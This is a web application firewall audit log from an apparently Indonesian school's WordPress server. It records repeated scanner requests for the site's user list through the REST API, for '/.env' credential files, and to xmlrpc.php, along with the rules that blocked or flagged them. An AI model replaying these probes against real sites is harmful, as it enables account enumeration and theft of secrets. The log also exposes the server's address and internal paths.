"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745609129593628 3488 (- - -) Stopwatch2: 1745609129593628 3488; combined=1497, p1=512, p2=926, p3=0, p4=0, p5=59, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66a56346-Z-- --d4ec071a-A-- [26/Apr/2025:02:25:37 +0700] aAvhseXF4ZX3hX-IbN52dwAAAJQ 103.236.140.4 36040 103.236.140.4 8181 --d4ec071a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4ec071a-C-- demo.sayHello --d4ec071a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4ec071a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745609137647095 6245 (- - -) Stopwatch2: 1745609137647095 6245; combined=4668, p1=580, p2=3825, p3=31, p4=36, p5=113, sr=75, sw=83, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4ec071a-Z-- --20191c5c-A-- [26/Apr/2025:02:42:11 +0700] aAvlk-XF4ZX3hX-IbN539gAAAJM 103.236.140.4 39898 103.236.140.4 8181 --20191c5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 80.87.128.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 80.87.128.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --20191c5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20191c5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745610131960707 3068 (- - -) Stopwatch2: 1745610131960707 3068; combined=1327, p1=436, p2=860, p3=0, p4=0, p5=31, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20191c5c-Z-- --a67dbb64-A-- [26/Apr/2025:02:58:47 +0700] aAvpd-XF4ZX3hX-IbN55nwAAAIQ 103.236.140.4 43776 103.236.140.4 8181 --a67dbb64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.247.15.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.247.15.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a67dbb64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a67dbb64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745611127710269 2815 (- - -) Stopwatch2: 1745611127710269 2815; combined=1312, p1=439, p2=842, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a67dbb64-Z-- --da999f54-A-- [26/Apr/2025:03:26:43 +0700] aAvwA-OdEP6frSVs8CozYQAAAAA 103.236.140.4 50300 103.236.140.4 8181 --da999f54-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.23.217.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.23.217.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --da999f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da999f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745612803906744 3819 (- - -) Stopwatch2: 1745612803906744 3819; combined=2127, p1=660, p2=1430, p3=0, p4=0, p5=37, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da999f54-Z-- --0d097458-A-- [26/Apr/2025:03:43:14 +0700] aAvz4tDEbIDiBZnoTx75PQAAAFE 103.236.140.4 54266 103.236.140.4 8181 --0d097458-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.216.163.43 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.216.163.43 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr --0d097458-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d097458-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745613794089180 842 (- - -) Stopwatch2: 1745613794089180 842; combined=365, p1=328, p2=0, p3=0, p4=0, p5=37, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d097458-Z-- --47df3521-A-- [26/Apr/2025:03:55:12 +0700] aAv2sNQ6lpQjDvc0F_Nb9gAAAMc 103.236.140.4 57052 103.236.140.4 8181 --47df3521-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.118.104.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.118.104.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47df3521-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47df3521-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745614512701591 3093 (- - -) Stopwatch2: 1745614512701591 3093; combined=1351, p1=458, p2=863, p3=0, p4=0, p5=30, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47df3521-Z-- --aa530f54-A-- [26/Apr/2025:04:21:55 +0700] aAv883GCMLWH05JCdxzX7gAAAIc 103.236.140.4 35076 103.236.140.4 8181 --aa530f54-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.12.138 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.12.138 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --aa530f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa530f54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745616115196046 866 (- - -) Stopwatch2: 1745616115196046 866; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa530f54-Z-- --d928af76-A-- [26/Apr/2025:05:30:15 +0700] aAwM99DEbIDiBZnoTx7_DwAAAEg 103.236.140.4 51152 103.236.140.4 8181 --d928af76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.191.230.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.191.230.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d928af76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d928af76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620215261527 3055 (- - -) Stopwatch2: 1745620215261527 3055; combined=1537, p1=502, p2=945, p3=0, p4=0, p5=89, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d928af76-Z-- --4b0dce70-A-- [26/Apr/2025:05:31:20 +0700] aAwNONQ6lpQjDvc0F_Nh6AAAAM4 103.236.140.4 51410 103.236.140.4 8181 --4b0dce70-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 142.202.241.115 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 142.202.241.115 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4b0dce70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b0dce70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620280186763 2763 (- - -) Stopwatch2: 1745620280186763 2763; combined=1176, p1=419, p2=717, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b0dce70-Z-- --5af58f10-A-- [26/Apr/2025:05:31:34 +0700] aAwNRnGCMLWH05JCdxzbrwAAAIw 103.236.140.4 51456 103.236.140.4 8181 --5af58f10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 205.196.221.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 205.196.221.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5af58f10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5af58f10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745620294622769 2689 (- - -) Stopwatch2: 1745620294622769 2689; combined=1344, p1=412, p2=902, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5af58f10-Z-- --50b0fd7f-A-- [26/Apr/2025:05:36:54 +0700] aAwOhtQ6lpQjDvc0F_NiOAAAANc 103.236.140.4 52692 103.236.140.4 8181 --50b0fd7f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 Accept-Charset: utf-8 --50b0fd7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b0fd7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745620614965350 837 (- - -) Stopwatch2: 1745620614965350 837; combined=376, p1=336, p2=0, p3=0, p4=0, p5=39, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b0fd7f-Z-- --50abc372-A-- [26/Apr/2025:05:56:33 +0700] aAwTIdDEbIDiBZnoTx4AgAAAAFg 103.236.140.4 57224 103.236.140.4 8181 --50abc372-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.38 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --50abc372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50abc372-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745621793011232 659 (- - -) Stopwatch2: 1745621793011232 659; combined=268, p1=237, p2=0, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50abc372-Z-- --ddeaf071-A-- [26/Apr/2025:05:56:38 +0700] aAwTJtDEbIDiBZnoTx4AhAAAAEY 103.236.140.4 57244 103.236.140.4 8181 --ddeaf071-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.38 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.38 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --ddeaf071-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddeaf071-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745621798159570 824 (- - -) Stopwatch2: 1745621798159570 824; combined=368, p1=329, p2=0, p3=0, p4=0, p5=39, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ddeaf071-Z-- --0fce2e11-A-- [26/Apr/2025:06:15:21 +0700] aAwXidQ6lpQjDvc0F_NkCAAAANQ 103.236.140.4 33304 103.236.140.4 8181 --0fce2e11-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G950U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0fce2e11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fce2e11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745622921462064 814 (- - -) Stopwatch2: 1745622921462064 814; combined=385, p1=346, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fce2e11-Z-- --0f8e4803-A-- [26/Apr/2025:06:56:12 +0700] aAwhHNQ6lpQjDvc0F_NnCAAAANY 103.236.140.4 42720 103.236.140.4 8181 --0f8e4803-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.255.223.213 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.255.223.213 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0f8e4803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f8e4803-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745625372790830 2682 (- - -) Stopwatch2: 1745625372790830 2682; combined=1363, p1=446, p2=888, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f8e4803-Z-- --f160c44a-A-- [26/Apr/2025:07:09:52 +0700] aAwkUNDEbIDiBZnoTx4EkwAAAEg 103.236.140.4 45900 103.236.140.4 8181 --f160c44a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f160c44a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f160c44a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626192782819 2326 (- - -) Stopwatch2: 1745626192782819 2326; combined=1322, p1=439, p2=853, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f160c44a-Z-- --18d46348-A-- [26/Apr/2025:07:09:55 +0700] aAwkU9DEbIDiBZnoTx4ElQAAAEk 103.236.140.4 45912 103.236.140.4 8181 --18d46348-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18d46348-C-- demo.sayHello --18d46348-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18d46348-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626195520487 6875 (- - -) Stopwatch2: 1745626195520487 6875; combined=4912, p1=617, p2=4028, p3=38, p4=43, p5=108, sr=118, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
